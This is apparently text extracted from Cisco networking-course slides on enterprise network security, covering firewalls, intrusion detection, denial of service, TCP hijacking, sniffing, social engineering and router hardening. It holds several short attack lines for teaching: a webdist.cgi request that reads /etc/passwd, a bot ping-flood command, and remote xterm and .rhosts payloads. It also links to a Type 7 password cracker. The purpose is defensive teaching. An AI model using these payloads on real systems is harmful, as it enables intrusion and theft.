Enterprise Network Security

Accessing the WAN – Chapter 4

Version 4.0

© 2006 Cisco Systems, Inc. All rights reserved.

Cisco Public

1

Objectives
     Describe the general methods used to mitigate security threats to Enterprise networks Configure Basic Router Security Explain how to disable unused Cisco router network services and interfaces Explain how to use Cisco SDM Manage Cisco IOS devices

© 2006 Cisco Systems, Inc. All rights reserved.

Cisco Public

2

A Brief History of the World

© 2006 Cisco Systems, Inc. All rights reserved.

Cisco Public

3

2. …etc. anxiety. or attack.com says: 1. 2. Cisco Public 4 . to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. confidence. 3. 3. Freedom from risk or danger. or fear. Measures adopted by a government to prevent espionage. sabotage. A group or department of private guards: Call building security if a visitor acts suspicious. Inc. as by a business or homeowner. All rights reserved. safety. as: 1. Something that gives or assures safety. © 2006 Cisco Systems. Measures adopted.What is “Security”  Dictionary. Freedom from doubt.

 Provide authentication and access control for resources Ex: AFS  Guarantee availability of resources Ex: 5 9’s (99. Cisco Public 5 . medical records. Inc.Why do we need security?  Protect vital information while still allowing access to those who need it Trade secrets. etc.999% reliability) © 2006 Cisco Systems. All rights reserved.

Cisco Public 6 .  Provide authentication and access control for resources Ex: AFS  Guarantee availability of resources Ex: 5 9’s (99. Inc.Why do we need security?  Protect vital information while still allowing access to those who need it Trade secrets. etc. medical records. All rights reserved.999% reliability) © 2006 Cisco Systems.

Cisco Public 7 . All rights reserved.Who is vulnerable?  Financial institutions and banks  Internet service providers  Pharmaceutical companies  Government and defense agencies  Contractors to various government agencies  Multinational corporations  ANYONE ON THE NETWORK © 2006 Cisco Systems. Inc.

Cisco Public 8 . IDS  TCP hijacking IPSec  Packet sniffing Encryption (SSH. HTTPS)  Social problems Education © 2006 Cisco Systems. Inc.Common security attacks and their countermeasures  Finding a way into the network Firewalls  Exploiting software bugs. All rights reserved. SSL. buffer overflows Intrusion Detection Systems  Denial of Service Ingress filtering.

Inc.Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time Difficult for users to keep up with changes and keep host secure Solution Administrators limit access to end hosts by using a firewall Firewall is kept up-to-date by administrators © 2006 Cisco Systems. Cisco Public 9 . All rights reserved.

Windows XP and Mac OS X have built in firewalls © 2006 Cisco Systems. Some routers come with firewall functionality ipfw. Cisco Public 10 .Firewalls  A firewall is like a castle with a drawbridge Only one point of access into the network This can be good or bad  Can be hardware or software Ex. All rights reserved. ipchains. Inc. pf on Unix systems.

email server. Firewall Firewall Intranet Cisco Public 11 . All rights reserved. etc © 2006 Cisco Systems.Firewalls Internet DMZ Web server. Inc. web proxy.

but they will not be discussed Ex. Drop packets with destination port of 23 (Telnet) Can use any combination of IP/UDP/TCP header information man ipfw on unix47 for much more detail  But why don’t we just turn Telnet off? © 2006 Cisco Systems. Cisco Public 12 .Firewalls  Used to filter packets based on a combination of features These are called packet filtering firewalls There are other types too. All rights reserved. Inc.

All rights reserved. or might not be able to control all the machines on the network © 2006 Cisco Systems. Cisco Public 13 . Inc.Firewalls  Here is what a computer with a default Windows XP install looks like: 135/tcp open loc-srv 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 3389/tcp open ms-term-serv 5000/tcp open UPnP  Might need some of these services.

IDS is only useful if contingency plans are in place to curb attacks as they are occurring © 2006 Cisco Systems.cgi?distloc=?. All rights reserved.cgi Can make a rule to drop packets containing the line “/cgi-bin/webdist. web server indexing. OS fingerprinting.  Example IRIX vulnerability in webdist. Cisco Public 14 . Inc.cat%20/etc/passwd”  However.Intrusion Detection  Uses “intrusion signatures” Well known patterns of behavior Ping sweeps. etc. DoS attempts. port scanning.

Cisco Public 15 . Inc.Minor Detour…  Say we got the /etc/passwd file from the IRIX server  What can we do with it? © 2006 Cisco Systems. All rights reserved.

All rights reserved.Dictionary Attack  We can run a dictionary attack on the passwords The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash) Can take a dictionary of words. crypt() them all. “sdfo839f” is a good password That is not my andrew password Please don’t try it either © 2006 Cisco Systems. Cisco Public 16 . and compare with the hashed passwords  This is why your passwords should be meaningless random junk! For example. Inc.

Cisco Public 17 .Denial of Service  Purpose: Make a network service unusable. All rights reserved. Inc. usually by overloading the server or network  Many different kinds of DoS attacks SYN flooding SMURF Distributed attacks Mini Case Study: Code-Red © 2006 Cisco Systems.

All rights reserved. and forget everything else Then. Inc. Cisco Public 18 . can recreate the forgotten information when the ACK comes in from a legitimate connection © 2006 Cisco Systems. server memory is exhausted with this state  Solution: use “SYN cookies” In response to a SYN. create a special “cookie” for the connection.Denial of Service  SYN flooding attack  Send SYN packets with bogus source address Why?  Server responds with SYN ACK and keeps state about TCP half-open connection Eventually.

Denial of Service © 2006 Cisco Systems. Cisco Public 19 . Inc. All rights reserved.

Denial of Service  SMURF Source IP address of a broadcast ping is forged Large number of machines respond back to victim. Cisco Public 20 . All rights reserved. Inc. overloading it © 2006 Cisco Systems.

All rights reserved. Cisco Public 21 . Inc.Denial of Service I I © 2006 Cisco Systems.

but on a much larger scale Example: Sub7Server Trojan and IRC bots Infect a large number of machines with a “zombie” program Zombie program logs into an IRC channel and awaits commands Example: Bot command: !p4 207.71.htm 22 © 2006 Cisco Systems.193 Result: runs ping.71.exe 207.000 64k packets to the host (655MB!) Read more at: http://grc.92. Inc. Cisco Public 22 .193 -l 65500 -n 10000 Sends 10.com/dos/grcdos.92. All rights reserved.Denial of Service  Distributed Denial of Service Same techniques as regular DoS.

Denial of Service
 Mini Case Study – CodeRed July 19, 2001: over 359,000 computers infected with Code-Red in less than 14 hours Used a recently known buffer exploit in Microsoft IIS Damages estimated in excess of $2.6 billion

© 2006 Cisco Systems, Inc. All rights reserved.

Cisco Public

23

Denial of Service
 Why is this under the Denial of Service category? CodeRed launched a DDOS attack against www1.whitehouse.gov from the 20th to the 28th of every month! Spent the rest of its time infecting other hosts

© 2006 Cisco Systems, Inc. All rights reserved.

Cisco Public

24

Denial of Service
 How can we protect ourselves? Ingress filtering If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it RFC 2267 has more information about this Stay on top of CERT advisories and the latest security patches A fix for the IIS buffer overflow was released sixteen days before CodeRed had been deployed!

© 2006 Cisco Systems, Inc. All rights reserved.

Cisco Public

25

All rights reserved.TCP Attacks  Recall how IP works… End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery Source address – host may trick destination into believing that the packet is from a trusted source Especially applications which use IP addresses as a simple authentication method Solution – use better authentication methods © 2006 Cisco Systems. Cisco Public 26 . Inc.

port numbers  Problem – what if an attacker learns these values? Port numbers are sometimes well known to begin with (ex. HTTP uses port 80) Sequence numbers are sometimes chosen in very predictable ways © 2006 Cisco Systems. All rights reserved. Inc. Cisco Public 27 .TCP Attacks  TCP connections have associated state Starting sequence numbers.

and the recipient will believe it came from the original source Ex. Cisco Public 28 . you download a virus and execute it © 2006 Cisco Systems. then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream. Inc. All rights reserved. Instead of downloading and running new program.TCP Attacks  If an attacker learns the associated TCP state for the connection.

Big Ears © 2006 Cisco Systems. Inc. Bob and Mr. All rights reserved.TCP Attacks  Say hello to Alice. Cisco Public 29 .

Inc. Cisco Public 30 . All rights reserved.TCP Attacks  Alice and Bob have an established TCP connection © 2006 Cisco Systems.

All rights reserved. Inc.TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network He can intercept all of their packets © 2006 Cisco Systems. Cisco Public 31 .

Inc. Cisco Public 32 .TCP Attacks  First. Mr. All rights reserved. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?) Packets The Void © 2006 Cisco Systems.

Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN. All rights reserved.TCP Attacks  Then. Inc. SRC=Alice © 2006 Cisco Systems. Mr. Cisco Public 33 .

Inc.rhosts” Or. “xterm -display MrBigEars:0” © 2006 Cisco Systems.TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob? Can just DoS Alice instead of dropping her packets Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted? Mitnick: payload is “add self to . Cisco Public 34 . All rights reserved.

All rights reserved.TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Trusting web client Malicious user © 2006 Cisco Systems. Cisco Public 35 . Inc.

so Mr. Big Ears cannot pretend to be Alice Encrypts data before transport. so Mr. Big Ears cannot talk to Bob without knowing what the session key is © 2006 Cisco Systems. Cisco Public 36 . Inc. All rights reserved.TCP Attacks  How do we prevent this?  IPSec Provides source authentication.

here is something completely unrelated to this lecture: © 2006 Cisco Systems. Cisco Public 37 .Five Minute Break  For your enjoyment. Inc. All rights reserved.

Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn’t get any easier to figure out what data is being transmitted over the network! © 2006 Cisco Systems. All rights reserved. Cisco Public 38 . Inc.

All rights reserved. Inc. it works for any broadcast-based medium © 2006 Cisco Systems.Packet Sniffing  This works for wireless too!  In fact. Cisco Public 39 .

All rights reserved. Inc. Cisco Public 40 .Packet Sniffing  What kinds of data can we get?  Asked another way. what kind of information would be most useful to a malicious user?  Answer: Anything in plain text Passwords are the most popular © 2006 Cisco Systems.

by the way. Inc. not Telnet Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!) Now that I have told you this.Packet Sniffing  How can we protect ourselves?  SSH. prohibited by Computing Services  HTTP over SSL Especially when making purchases with credit cards!  SFTP. not FTP Unless you really don’t care about the password or data Can also use KerbFTP (download from MyAndrew)  IPSec Provides network-layer confidentiality © 2006 Cisco Systems. Cisco Public 41 . please do not exploit this information Packet sniffing is. All rights reserved.

All rights reserved. etc. unless they have been specially trained Think government here… © 2006 Cisco Systems. Inc. Cisco Public 42 . harmed. to give up valuable information Most humans will breakdown once they are at the “harmed” stage. threatened. tortured. manipulated.Social Problems  People can be just as dangerous as unprotected computer systems People can be lied to. bribed.

All rights reserved. I’m stuck on a pole. Cisco Public 43 . I need you to punch a bunch of buttons for me” © 2006 Cisco Systems. Inc. I’m your AT&T rep.Social Problems  Fun Example 1: “Hi.

we have a call that’s actually active right now. All rights reserved. you’ve got about $2000 worth of charges on your card and … read off your AT&T card number and PIN and then I’ll get rid of the charge for you” © 2006 Cisco Systems. Cisco Public 44 .Social Problems  Fun Example 2: Someone calls you in the middle of the night “Have you been calling Egypt for the last six hours?” “No” “Well. Inc. it’s on your calling card and it’s to Egypt and as a matter of fact.

the three disgruntled employees installed a money-stealing worm onto the companies systems They did this from inside the company.Social Problems  Fun Example 3: Who saw Office Space? In the movie. Cisco Public 45 . where they had full access to the companies systems What security techniques can we use to prevent this type of access? © 2006 Cisco Systems. All rights reserved. Inc.

Social Problems  There aren’t always solutions to all of these problems Humans will continue to be tricked into giving out information they shouldn’t Educating them may help a little here. this solution is still not perfect © 2006 Cisco Systems. depending on how bad you want the information. the best that can be done is to implement a wide variety of solutions and more closely monitor who has access to what network resources and information But. but. there are a lot of bad things you can do to get it  So. All rights reserved. Cisco Public 46 . Inc.

Inc. All rights reserved. Cisco Public 47 .Configure Basic Router Security  Explain why the security of routers and their configuration settings is vital to network operation © 2006 Cisco Systems.

All rights reserved. Inc.Securing Your Network Think about router security in terms in these categories: 1. Cisco Public 48 .Physical security 2.Update the router IOS whenever advisable 3.Harden the router to eliminate the potential abuse of unused ports and services © 2006 Cisco Systems.Backup the router configuration and IOS 4.

All rights reserved.Configure Basic Router Security  Applying Cisco IOS Security Features To Routers © 2006 Cisco Systems. Cisco Public 49 . Inc.

This is not secure since anyone walking behind you when you are looking at a router configuration could snoop over your shoulder and see the password. Inc. © 2006 Cisco Systems. Cisco IOS software leaves passwords in plain text when they are entered on a router. Cisco Public 50 . All rights reserved.Configure Basic Router Security  By default.

All rights reserved. Cisco Public 51 . This is not secure since anyone walking behind you when you are looking at a router configuration could snoop over your shoulder and see the password.Manage Router Security  By default. Cisco IOS software leaves passwords in plain text when they are entered on a router. © 2006 Cisco Systems. Inc.

© 2006 Cisco Systems. All rights reserved. Inc. Cisco Public 52 .Manage Router Security  Using the enable password command or the username username password password command would result in these passwords being displayed when looking at the running configuration.

Manage Router Security  Encrypting Password with Type 7 encryption © 2006 Cisco Systems. Inc. Cisco Public 53 . All rights reserved.

html © 2006 Cisco Systems. Inc.ifm. Cisco Public 54 .nz/cookbooks/passwordcracker.Cracking Type 7 Encryption  To crack a type 7 cisco router password go to http://www. All rights reserved.net.

Using MD5 Encryption  MD5 (Message-Digest algorithm 5) is a widely used cryptographic hash function with a 128-bit hash value. Cisco Public 55 . All rights reserved. Inc. © 2006 Cisco Systems.

All rights reserved.3(1) and later allow administrators to set the minimum character length for all router passwords using the security passwords minlength global configuration command. Cisco Public 56 . © 2006 Cisco Systems.Setting Password Length  Cisco IOS Software Release 12. Inc.

Set the domain name 3. Configure SSH timeouts 6. Cisco Public 57 . Test SSH on PC © 2006 Cisco Systems.Securing Remote Administrative Access To Routers  Controlling VTY Line 0 4 –Telnet/SSH 1. Configure local authentication and vty 5. All rights reserved. Set router parameters 2. Generate asymmetric keys 4. Inc.

Inc. All rights reserved. Cisco Public 58 .Explain How to Disable Unused Cisco Router Network Services and Interfaces  Describe the router services and interfaces that are vulnerable to network attack © 2006 Cisco Systems.

Cisco Public 59 . Inc.Explain How to Disable Unused Cisco Router Network Services and Interfaces  Explain the vulnerabilities posed by commonly configured management services © 2006 Cisco Systems. All rights reserved.

These include: © 2006 Cisco Systems. Inc. Services which should typically be disabled are listed below. All rights reserved. The show running-config output in the figure provides a sample configuration of various services which has been disabled. Cisco Public 60 .Securing Vulnerable Router Services and Interfaces  There are a variety of commands that are required to disable services.

Inc. or are used for remote router configuration. Cisco Public 61 . The corresponding commands to disable these services are: © 2006 Cisco Systems. send special packets.Securing Vulnerable Router Services and Interfaces  Disable services that allow certain packets to pass through the router. All rights reserved.

Inc.Securing Vulnerable Router Services and Interfaces  The interfaces on the router can be made more secure by using certain commands in interface configuration mode: © 2006 Cisco Systems. All rights reserved. Cisco Public 62 .

All rights reserved. Inc.Explain How to Disable Unused Cisco Router Network Services and Interfaces  Explain how to secure a router with the command-line interface (CLI) auto secure command © 2006 Cisco Systems. Cisco Public 63 .

Locking Down A Router Using Cisco Auto Secure  Cisco AutoSecure uses a single command to disable non-essential system processes and services. eliminating potential security threats. You can configure AutoSecure in privileged EXEC mode using the auto secure command © 2006 Cisco Systems. Inc. All rights reserved. Cisco Public 64 .

All rights reserved.Manage Cisco IOS Devices  Describe how to backup and upgrade a Cisco IOS image © 2006 Cisco Systems. Cisco Public 65 . Inc.

The Cisco IOS software copy command is used to move configuration files from one component or device to another.Commands for Managing Configuration Files  Good practice for maintaining system availability is to ensure you always have backup copies of the startup configuration files and IOS image files. All rights reserved. Cisco Public 66 . or a TFTP server. Inc. NVRAM. © 2006 Cisco Systems. such as RAM.

Cisco Public 67 .Commands for Managing Configuration Files © 2006 Cisco Systems. All rights reserved. Inc.

Cisco Public 68 . All rights reserved. Inc.Manage Cisco IOS Devices  Explain how to back up and upgrade Cisco IOS software images using a network server © 2006 Cisco Systems.

Inc.Manage Cisco IOS Devices  Explain how to recover a Cisco IOS software image © 2006 Cisco Systems. Cisco Public 69 . All rights reserved.

Inc. All rights reserved. Cisco Public 70 .Manage Cisco IOS Devices  Compare the use of the show and debug commands when troubleshooting Cisco router configurations © 2006 Cisco Systems.

Inc.Manage Cisco IOS Devices  Explain how to recover the enable password and the enable secret passwords © 2006 Cisco Systems. All rights reserved. Cisco Public 71 .

Summary  Security Threats to an Enterprise network include: –Unstructured threats –Structured threats –External threats –Internal threats  Methods to lessen security threats consist of: –Device hardening –Use of antivirus software –Firewalls –Download security updates © 2006 Cisco Systems. Inc. Cisco Public 72 . All rights reserved.

Summary  Basic router security involves the following: –Physical security –Update and backup IOS –Backup configuration files –Password configuration –Logging router activity  Disable unused router interfaces & services to minimize their exploitation by intruders  Cisco SDM –A web based management tool for configuring security measures on Cisco routers © 2006 Cisco Systems. Cisco Public 73 . Inc. All rights reserved.

Inc. Cisco Public 74 .Summary  Cisco IOS Integrated File System (IFS) –Allows for the creation. navigation & manipulation of directories on a cisco device © 2006 Cisco Systems. All rights reserved.

Inc.© 2006 Cisco Systems. All rights reserved. Cisco Public 75 .

Sign up to vote on this title
UsefulNot useful